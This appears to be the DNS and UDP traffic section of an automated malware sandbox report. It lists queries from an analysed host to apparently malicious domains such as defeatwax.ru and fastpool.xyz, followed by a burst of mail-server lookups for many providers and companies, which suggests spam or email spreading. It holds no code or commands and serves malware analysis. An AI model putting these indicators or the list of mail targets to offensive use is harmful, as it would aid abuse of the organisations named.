Aug 24, 2021 08:48:31.352036953 CEST	53	51123	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:31.396404982 CEST	58884	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:31.428374052 CEST	53	58884	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:31.607810974 CEST	58664	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:31.671648979 CEST	53	58664	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:31.680845976 CEST	59140	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:31.712822914 CEST	53	59140	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:32.194891930 CEST	57977	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:32.232836962 CEST	53	57977	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:32.261037111 CEST	60598	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:32.293278933 CEST	53	60598	8.8.8.8	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 24, 2021 08:46:30.470843077 CEST	192.168.2.7	8.8.8.8	0x8485	Standard query (0)	readinglistforaugust1.xyz	A (IP address)	IN (0x0001)
Aug 24, 2021 08:46:30.526827097 CEST	192.168.2.7	8.8.8.8	0xb346	Standard query (0)	readinglistforaugust2.xyz	A (IP address)	IN (0x0001)
Aug 24, 2021 08:46:42.472193003 CEST	192.168.2.7	8.8.8.8	0x2272	Standard query (0)	readinglistforaugust3.xyz	A (IP address)	IN (0x0001)
Aug 24, 2021 08:46:54.171333075 CEST	192.168.2.7	8.8.8.8	0xf66b	Standard query (0)	swretjhwrtj.gq	A (IP address)	IN (0x0001)
Aug 24, 2021 08:46:56.527883053 CEST	192.168.2.7	8.8.8.8	0x986	Standard query (0)	eduarroma.tumblr.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:13.481050014 CEST	192.168.2.7	8.8.8.8	0x7195	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:13.534020901 CEST	192.168.2.7	8.8.8.8	0xe4ba	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:16.165040970 CEST	192.168.2.7	8.8.8.8	0xcd	Standard query (0)	readinglistforaugust3.xyz	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:36.951066971 CEST	192.168.2.7	8.8.8.8	0xa2ce	Standard query (0)	defeatwax.ru	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:46.389419079 CEST	192.168.2.7	8.8.8.8	0x750e	Standard query (0)	telete.in	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:49.095525980 CEST	192.168.2.7	8.8.8.8	0x4901	Standard query (0)	hotmail.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:47:49.150626898 CEST	192.168.2.7	8.8.8.8	0x2d63	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:49.202564001 CEST	192.168.2.7	8.8.8.8	0x6eb5	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:49.264995098 CEST	192.168.2.7	8.8.8.8	0x5ee1	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:49.390922070 CEST	192.168.2.7	8.8.8.8	0x5f00	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:49.466455936 CEST	192.168.2.7	8.8.8.8	0xf7fe	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:49.508483887 CEST	192.168.2.7	8.8.8.8	0xf1be	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:49.556412935 CEST	192.168.2.7	8.8.8.8	0x1da4	Standard query (0)	fastpool.xyz	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:49.559547901 CEST	192.168.2.7	8.8.8.8	0xac4	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:50.158379078 CEST	192.168.2.7	8.8.8.8	0x5d75	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:50.163214922 CEST	192.168.2.7	8.8.8.8	0xa32e	Standard query (0)	msn.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:47:50.232990026 CEST	192.168.2.7	8.8.8.8	0xf84b	Standard query (0)	msn-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:50.243258953 CEST	192.168.2.7	8.8.8.8	0x9bac	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:50.388046980 CEST	192.168.2.7	8.8.8.8	0x669f	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:50.970529079 CEST	192.168.2.7	8.8.8.8	0xd6ae	Standard query (0)	live.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:47:51.015222073 CEST	192.168.2.7	8.8.8.8	0x8ad2	Standard query (0)	live-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:51.021343946 CEST	192.168.2.7	8.8.8.8	0xc42c	Standard query (0)	hotmail.co.uk	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:47:51.021555901 CEST	192.168.2.7	8.8.8.8	0xd891	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:51.071279049 CEST	192.168.2.7	8.8.8.8	0xda70	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:51.084142923 CEST	192.168.2.7	8.8.8.8	0x3c9	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:51.266520023 CEST	192.168.2.7	8.8.8.8	0xe822	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:51.269180059 CEST	192.168.2.7	8.8.8.8	0x7282	Standard query (0)	charter.net	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:47:51.350632906 CEST	192.168.2.7	8.8.8.8	0x2fba	Standard query (0)	mx0.charter.net	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:51.479358912 CEST	192.168.2.7	8.8.8.8	0x9428	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:51.597130060 CEST	192.168.2.7	8.8.8.8	0x51e7	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:51.814192057 CEST	192.168.2.7	8.8.8.8	0xb8a8	Standard query (0)	barkochicomail.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:47:51.898910999 CEST	192.168.2.7	8.8.8.8	0x196f	Standard query (0)	smtp-mx10d4.mixmail.com.mx	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:51.912298918 CEST	192.168.2.7	8.8.8.8	0x17b8	Standard query (0)	live.co.uk	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:47:51.965262890 CEST	192.168.2.7	8.8.8.8	0x9735	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:52.159178972 CEST	192.168.2.7	8.8.8.8	0xe4f2	Standard query (0)	live-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:52.162072897 CEST	192.168.2.7	8.8.8.8	0x7ff0	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:52.682811975 CEST	192.168.2.7	8.8.8.8	0xefee	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:52.893558025 CEST	192.168.2.7	8.8.8.8	0x5055	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:52.991436958 CEST	192.168.2.7	8.8.8.8	0x523	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:53.409218073 CEST	192.168.2.7	8.8.8.8	0x6ffb	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:53.513509989 CEST	192.168.2.7	8.8.8.8	0x71e1	Standard query (0)	msn-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:53.541570902 CEST	192.168.2.7	8.8.8.8	0xe901	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:53.693383932 CEST	192.168.2.7	8.8.8.8	0x49b4	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:53.903290033 CEST	192.168.2.7	8.8.8.8	0x3f44	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:54.108726978 CEST	192.168.2.7	8.8.8.8	0xb1d4	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:54.157438993 CEST	192.168.2.7	8.8.8.8	0x75c1	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:54.220375061 CEST	192.168.2.7	8.8.8.8	0x72ef	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:54.230453014 CEST	192.168.2.7	8.8.8.8	0xb038	Standard query (0)	hotmail.fr	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:47:54.554296970 CEST	192.168.2.7	8.8.8.8	0x381e	Standard query (0)	msn-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:54.554332972 CEST	192.168.2.7	8.8.8.8	0x2a55	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:54.638082027 CEST	192.168.2.7	8.8.8.8	0xb47c	Standard query (0)	live-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:54.731178999 CEST	192.168.2.7	8.8.8.8	0x5aab	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:54.908427954 CEST	192.168.2.7	8.8.8.8	0x6233	Standard query (0)	live-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:54.928452969 CEST	192.168.2.7	8.8.8.8	0x3b4a	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:55.117104053 CEST	192.168.2.7	8.8.8.8	0xd00b	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:55.130242109 CEST	192.168.2.7	8.8.8.8	0x5b8b	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:55.213383913 CEST	192.168.2.7	8.8.8.8	0x6ea1	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:55.318926096 CEST	192.168.2.7	8.8.8.8	0xb828	Standard query (0)	live-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:55.445219040 CEST	192.168.2.7	8.8.8.8	0x1a82	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:55.445497990 CEST	192.168.2.7	8.8.8.8	0x1b2f	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:55.653914928 CEST	192.168.2.7	8.8.8.8	0xf20a	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:55.717873096 CEST	192.168.2.7	8.8.8.8	0xcca1	Standard query (0)	mx0.charter.net	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:55.865190983 CEST	192.168.2.7	8.8.8.8	0x7f22	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:55.986428976 CEST	192.168.2.7	8.8.8.8	0x77a0	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:56.074161053 CEST	192.168.2.7	8.8.8.8	0x187e	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:56.119126081 CEST	192.168.2.7	8.8.8.8	0xae07	Standard query (0)	hotmail.es	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:47:56.185913086 CEST	192.168.2.7	8.8.8.8	0x7c3e	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:56.278522015 CEST	192.168.2.7	8.8.8.8	0x11ed	Standard query (0)	live-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:56.467125893 CEST	192.168.2.7	8.8.8.8	0xb0de	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:56.634409904 CEST	192.168.2.7	8.8.8.8	0xbef3	Standard query (0)	hotmail.de	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:47:56.928567886 CEST	192.168.2.7	8.8.8.8	0xdee3	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:56.928611994 CEST	192.168.2.7	8.8.8.8	0x8d26	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:57.302541971 CEST	192.168.2.7	8.8.8.8	0xb0c6	Standard query (0)	msn-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:57.445425034 CEST	192.168.2.7	8.8.8.8	0x679b	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:57.537364006 CEST	192.168.2.7	8.8.8.8	0xdb86	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:57.896557093 CEST	192.168.2.7	8.8.8.8	0xedef	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:58.001359940 CEST	192.168.2.7	8.8.8.8	0xc609	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:58.005964994 CEST	192.168.2.7	8.8.8.8	0x2405	Standard query (0)	msa.hinet.net	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:47:58.048698902 CEST	192.168.2.7	8.8.8.8	0xc281	Standard query (0)	msa-smtp-mx1.hinet.net	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:58.053445101 CEST	192.168.2.7	8.8.8.8	0x73d	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:58.262962103 CEST	192.168.2.7	8.8.8.8	0x55e5	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:58.263437033 CEST	192.168.2.7	8.8.8.8	0x34c4	Standard query (0)	roc.gr	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:47:58.602530956 CEST	192.168.2.7	8.8.8.8	0x87f7	Standard query (0)	mx20.mailspamprotection.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:58.838399887 CEST	192.168.2.7	8.8.8.8	0xa42f	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:59.409190893 CEST	192.168.2.7	8.8.8.8	0x165e	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:59.657447100 CEST	192.168.2.7	8.8.8.8	0x5ebc	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:00.484502077 CEST	192.168.2.7	8.8.8.8	0x8739	Standard query (0)	live-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:00.511816025 CEST	192.168.2.7	8.8.8.8	0x6300	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:00.512212992 CEST	192.168.2.7	8.8.8.8	0x77a2	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:00.837156057 CEST	192.168.2.7	8.8.8.8	0x56a4	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:01.050964117 CEST	192.168.2.7	8.8.8.8	0x79ba	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:02.248958111 CEST	192.168.2.7	8.8.8.8	0x4928	Standard query (0)	msn-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:02.249150991 CEST	192.168.2.7	8.8.8.8	0x67d6	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:02.249885082 CEST	192.168.2.7	8.8.8.8	0xa370	Standard query (0)	yahoo.com.au	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:02.341387987 CEST	192.168.2.7	8.8.8.8	0x4127	Standard query (0)	mta6.am0.yahoodns.net	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:02.480631113 CEST	192.168.2.7	8.8.8.8	0x558e	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:02.796685934 CEST	192.168.2.7	8.8.8.8	0xd8be	Standard query (0)	www.instagram.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:02.906274080 CEST	192.168.2.7	8.8.8.8	0x7bc6	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:03.014655113 CEST	192.168.2.7	8.8.8.8	0xc8d4	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:03.015027046 CEST	192.168.2.7	8.8.8.8	0xc4	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:03.102224112 CEST	192.168.2.7	8.8.8.8	0xd9a1	Standard query (0)	aol.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:03.166201115 CEST	192.168.2.7	8.8.8.8	0x1030	Standard query (0)	mx-aol.mail.gm0.yahoodns.net	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:03.254343987 CEST	192.168.2.7	8.8.8.8	0xb88d	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:03.278009892 CEST	192.168.2.7	8.8.8.8	0x634	Standard query (0)	free.fr	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:03.383295059 CEST	192.168.2.7	8.8.8.8	0x90de	Standard query (0)	mx1.free.fr	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:03.398963928 CEST	192.168.2.7	8.8.8.8	0x11ce	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:03.470868111 CEST	192.168.2.7	8.8.8.8	0x6aad	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:03.520961046 CEST	192.168.2.7	8.8.8.8	0x39a9	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:03.751368046 CEST	192.168.2.7	8.8.8.8	0x5fd7	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:03.866878986 CEST	192.168.2.7	8.8.8.8	0x701c	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:03.998779058 CEST	192.168.2.7	8.8.8.8	0x52f5	Standard query (0)	live-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:03.999362946 CEST	192.168.2.7	8.8.8.8	0x67d6	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:03.999877930 CEST	192.168.2.7	8.8.8.8	0x456c	Standard query (0)	outlook.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:04.057404041 CEST	192.168.2.7	8.8.8.8	0x3469	Standard query (0)	outlook-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:04.147489071 CEST	192.168.2.7	8.8.8.8	0x95b4	Standard query (0)	slu.edu	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:04.236248970 CEST	192.168.2.7	8.8.8.8	0xa42c	Standard query (0)	mxa-00234e01.gslb.pphosted.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:04.248840094 CEST	192.168.2.7	8.8.8.8	0x1efc	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:04.316931009 CEST	192.168.2.7	8.8.8.8	0x3f8a	Standard query (0)	live-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:04.358160973 CEST	192.168.2.7	8.8.8.8	0xd8a0	Standard query (0)	zdf.de	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:04.419647932 CEST	192.168.2.7	8.8.8.8	0x73c9	Standard query (0)	inmail.zdf.de	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:04.730052948 CEST	192.168.2.7	8.8.8.8	0xdf8c	Standard query (0)	mxa-00234e01.gslb.pphosted.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:04.770129919 CEST	192.168.2.7	8.8.8.8	0xc06	Standard query (0)	trivett.com.au	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:04.988662004 CEST	192.168.2.7	8.8.8.8	0xa4a7	Standard query (0)	mx08-00031601.pphosted.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:05.041500092 CEST	192.168.2.7	8.8.8.8	0x50d7	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:05.276007891 CEST	192.168.2.7	8.8.8.8	0x178a	Standard query (0)	msn-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:05.283545971 CEST	192.168.2.7	8.8.8.8	0xa75a	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:05.328938961 CEST	192.168.2.7	8.8.8.8	0x5ec0	Standard query (0)	sun.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:05.383191109 CEST	192.168.2.7	8.8.8.8	0x1373	Standard query (0)	mxa-00069f01.gslb.pphosted.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:05.397125959 CEST	192.168.2.7	8.8.8.8	0xf654	Standard query (0)	77.52.17.84.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 24, 2021 08:48:05.515500069 CEST	192.168.2.7	8.8.8.8	0x2c91	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:05.723948002 CEST	192.168.2.7	8.8.8.8	0x1beb	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:05.853920937 CEST	192.168.2.7	8.8.8.8	0xdc4b	Standard query (0)	aspentech.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:05.957287073 CEST	192.168.2.7	8.8.8.8	0x4095	Standard query (0)	mxb-0023c001.gslb.pphosted.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:05.960591078 CEST	192.168.2.7	8.8.8.8	0xcb8c	Standard query (0)	selinc.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:06.196789026 CEST	192.168.2.7	8.8.8.8	0xcecd	Standard query (0)	mxa-000e8d01.gslb.pphosted.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:06.210319042 CEST	192.168.2.7	8.8.8.8	0x2c28	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:06.283145905 CEST	192.168.2.7	8.8.8.8	0x5bbe	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:06.398854017 CEST	192.168.2.7	8.8.8.8	0xa962	Standard query (0)	msn-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:06.496726990 CEST	192.168.2.7	8.8.8.8	0x4ad4	Standard query (0)	crbard.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:06.683919907 CEST	192.168.2.7	8.8.8.8	0xca38	Standard query (0)	smtpmail6.crbard.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:06.798604012 CEST	192.168.2.7	8.8.8.8	0x7676	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:06.848838091 CEST	192.168.2.7	8.8.8.8	0xe4f9	Standard query (0)	ametek.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:06.906260014 CEST	192.168.2.7	8.8.8.8	0x9ad2	Standard query (0)	mxa-001ec801.gslb.pphosted.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:06.945261002 CEST	192.168.2.7	8.8.8.8	0xe38f	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:07.197958946 CEST	192.168.2.7	8.8.8.8	0x66e3	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:07.289974928 CEST	192.168.2.7	8.8.8.8	0x739c	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:07.376939058 CEST	192.168.2.7	8.8.8.8	0x48a5	Standard query (0)	msn-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:07.433233023 CEST	192.168.2.7	8.8.8.8	0x8ba5	Standard query (0)	edwardjones.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:07.621295929 CEST	192.168.2.7	8.8.8.8	0x2fea	Standard query (0)	napasmss-1.edwardjones.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:07.625211954 CEST	192.168.2.7	8.8.8.8	0x6ed	Standard query (0)	live-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:07.884996891 CEST	192.168.2.7	8.8.8.8	0x79e9	Standard query (0)	mxa-001ec801.gslb.pphosted.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:08.080835104 CEST	192.168.2.7	8.8.8.8	0x226a	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:08.095005989 CEST	192.168.2.7	8.8.8.8	0x5de	Standard query (0)	cb-sisco.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:08.280283928 CEST	192.168.2.7	8.8.8.8	0xd2fc	Standard query (0)	mxa-002c2d01.gslb.pphosted.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:08.294948101 CEST	192.168.2.7	8.8.8.8	0xc3a7	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:08.451754093 CEST	192.168.2.7	8.8.8.8	0xe5b9	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:08.621613026 CEST	192.168.2.7	8.8.8.8	0x29b7	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:08.643352032 CEST	192.168.2.7	8.8.8.8	0x6231	Standard query (0)	live-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:08.898665905 CEST	192.168.2.7	8.8.8.8	0x2a46	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:08.925919056 CEST	192.168.2.7	8.8.8.8	0xdb98	Standard query (0)	ni.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:09.029788017 CEST	192.168.2.7	8.8.8.8	0x38a4	Standard query (0)	mxb-00010702.gslb.pphosted.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:09.030323982 CEST	192.168.2.7	8.8.8.8	0xe0c4	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:09.367027044 CEST	192.168.2.7	8.8.8.8	0x4763	Standard query (0)	tps.org	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:09.817342043 CEST	192.168.2.7	8.8.8.8	0x582f	Standard query (0)	mxa-0063c401.gslb.pphosted.com	A (IP address)	IN (0x0001)
